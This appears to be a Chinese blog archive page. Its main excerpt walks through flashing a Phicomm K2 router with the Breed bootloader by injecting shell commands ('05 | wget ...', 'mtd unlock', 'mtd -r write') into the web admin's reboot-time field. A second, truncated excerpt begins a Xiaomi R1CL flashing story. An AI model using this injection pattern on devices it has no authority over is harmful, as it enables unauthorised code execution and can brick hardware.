分类目录归档:硬件

斐讯 K2 v22.4.6.3 (A6)版本固件刷 Padavan 详细过程

抓住了上车的尾巴,淘宝淘了一个六十块的斐讯 K2,到手之后发现系统固件版本为 v22.4.6.3,硬件版本 A6,通过搜索相关资料总结如下过程以备后来参考。

主要过程是通过默认 Web 管理界面上的参数过滤不严的一个小漏洞进行下载固件、解锁 Bootloader、刷入 Breed 三步。

首先,我们要正常启动路由器,使得路由器可以正常连接网络,用一根网线连接路由器的 LAN 口和电脑。接着,点击右边的「关机」一样的那个按钮,选择「定时重启路由器」。弹出一个定时窗口后,找到分钟下拉列表里的一个数字,本例使用 05。然后通过 Chrome 的开发者工具修改此元素,使 value 分别为,并分别点击保存:

05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
05 | mtd unlock Bootloader
05 | mtd -r write breed-mt7620-phicomm-psg1208.bin Bootloader

.bin文件在下载前最好试试,我的网络就无法正常下载 bin,挂了梯子之后下载下来并传到了自己的服务器上再使用。

之后路由器会自动重启,Breed 就已经刷好。
拔掉电源,拔掉 Wan 上的网线,保留 Lan 和电脑的连线,按住 Reset 键,插入电源,保持三秒。
电脑浏览器访问 192.168.2.1 进入 Breed,备份 EEROM 等,刷入 Pavadan 固件。

小米路由器青春版 R1CL 刷入 PandoraBox 过程

感觉现在这技术水平也就修修路由器了…
小米路由器青春版 (R1CL) 价格便宜厚道,造型也不错,想都没想就给家里买了一个日常使用,今天整个刷机过程下来感觉的确体积小,以后出去玩没流量的时候,在酒店里不妨随身携带一个刷好的路由器。

0.起因

今天刚把博客收拾好,查看源代码时,发现了一段不明的 js 如下。

经查询,是小米路由器强行插入的一段…

继续阅读